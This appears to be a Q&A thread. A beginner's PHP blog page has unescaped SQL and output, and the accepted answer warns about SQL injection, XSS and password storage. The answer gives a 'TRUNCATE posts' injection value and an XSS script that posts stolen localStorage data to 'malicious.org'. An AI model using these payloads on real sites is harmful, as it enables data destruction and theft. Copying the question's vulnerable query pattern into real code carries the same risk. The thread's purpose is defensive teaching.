# Edit blog post securely

Tags: php

So, I'm a beginner at PHP and SQL. I'm creating a simple blog. I have index.php, where you post the blog and blog.php, which displays the blog posts. I want to be able to add an edit link under each blog post on blog.php. Once you click this edit link, you can edit the blog on another page. I'm wondering what the most secure way to do this is, without using a framework. Here is the code on blog.php:

```
<?php include("session_start.php")?>

<?php

$sql = "SELECT * FROM posts WHERE user_name='$user_name' ORDER BY post_date DESC";

$result = mysqli_query($connection, $sql) or die(mysqli_error($connection));

?>

<html>
    <head>
        <title>Blog</title>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" >

<!-- Optional theme -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css" >

<link rel="stylesheet" href="styles.css" >

<!-- Latest compiled and minified JavaScript -->
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>

    </head>
    <body>

<div class="container">
  <div class="row"> 

<div class="align-right">  
<a href='index.php'>Post a Blog</a> | <a href='account_settings.php'>Account Settings</a> | <a href='logout.php' onclick="return confirm('Are you sure?')">Logout</a>
</div>  

<h1>Blog</h1>

<?php
while($column = mysqli_fetch_assoc($result)){
?>
<h2><?php echo $column["post_title"]?></h2>
<div class="view-post-content"><?php echo $column["post_content"]?></div>
<p class="category">Category: <?php echo $column["post_category"]?></p>
<p>This post was written <?php echo $column["post_date"]?>.</p>
<?php
}
?>

</div>
</div>

</body>
</html>

<?php include "footer.php";?>
```

Comment: Do you have any sort of user authentication setup in your PHP application?  This is probably the first place to start.  At each request surrounding a blog post, PHP would verify that the user is who he says he is, that he has rights to read/edit/delete a given post, etc.

Comment: If we talk about "the secure way", then its a broad question.But If you just need to edit the blog posts, simply send the blog post id's to the edit page, and get the blog data from database by its id.

Comment: But isn't sending blog id's somewhat insecure, as other people can guess those id's to access the page?

Answer (score 0, accepted):

Can't say in one word, but 'll try to make a hits based on your code example, and some basics.

1. SQL Injections

   $sql = "SELECT * FROM posts WHERE user_name='$user_name' ORDER BY post_date DESC";

   guess what happened if `$user_name = "'TRUNCATE posts;"`
2. XSS (Cross Site Scripting)
   for example if you should be aware that malicious user may inject client scripting, so when you'll display saved posts that will have value like:

   $post = 'Wow, cool blog! < script >$.post('h t t p://malicious.org/', {localStorage.STOLE_USER_DATA_N_PASSWORDS})< /script>'
3. Store secure data crypted (do not save passwods in DB in raw)
   always crypt them 
   http://php.net/manual/en/function.crypt.php

There are a lot-lot of other things, even mention it all will be a book.
But if you just playing around these few hints will help you.

And ofcourse google, read, google... :)